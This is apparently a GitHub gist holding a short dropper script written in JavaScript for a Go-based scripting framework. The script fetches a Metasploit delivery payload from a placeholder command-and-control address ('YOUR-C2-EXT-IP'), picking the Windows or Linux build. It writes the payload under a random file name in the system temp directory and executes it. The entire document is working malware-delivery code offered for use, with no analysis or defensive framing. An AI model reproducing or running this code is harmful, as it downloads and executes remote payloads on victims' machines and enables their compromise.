//timeout:150 | |
//go_import:os as os | |
function Drop(drop_url, fullpath) { | |
var headers = {"User-Agent" : "Hello-Lol-Dont-Look-Thx"}; | |
console.log("Payload destination : " + fullpath); | |
console.log("Payload source : " + drop_url); | |
var drop = G.requests.GetURLAsBytes(drop_url, headers, true); | |
if (drop[2] == null){ | |
console.log("No errors fetching from source"); | |
} else { | |
console.log("errors: "+ drop[2].Errors()); | |
} | |
console.log("Writing to file..."); | |
// response[1] for data | |
errors = G.file.WriteFileFromBytes(fullpath, drop[1]); | |
if (errors == null){ | |
console.log("No errors writing to destination"); | |
} else { | |
console.log("errors: "+ drop[2].errors()); | |
} | |
return true; | |
} | |
function Deploy() { | |
var final_bin = G.rand.GetAlphaNumericString(6); | |
var tmppath = os.TempDir(); | |
// Define your Metasploit delivery URLs here | |
var windows_url = "http://YOUR-C2-EXT-IP:8080/delivery_tcp_window'"; | |
var linux_url = "http://YOUR-C2-EXT-IP:8081/delivery_tcp_linux"; | |
console.log("Detected OS is " + OS); | |
if (OS == "windows") { | |
//if windows | |
fullpath = tmppath+"\\"+final_bin+".exe"; | |
Drop(windows_url, fullpath); | |
} else { | |
//if linux or OSX | |
fullpath = tmppath+"/"+final_bin; | |
Drop(linux_url, fullpath); | |
} | |
var running = G.exec.ExecuteCommandAsync(fullpath, [""]); | |
if (running[1] != null) { | |
console.log("errors: "+running[1].Error()); | |
} else { | |
console.log("pid: "+running[0].Process.Pid); | |
} | |
console.log("Done."); | |
return true; | |
}⏎ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment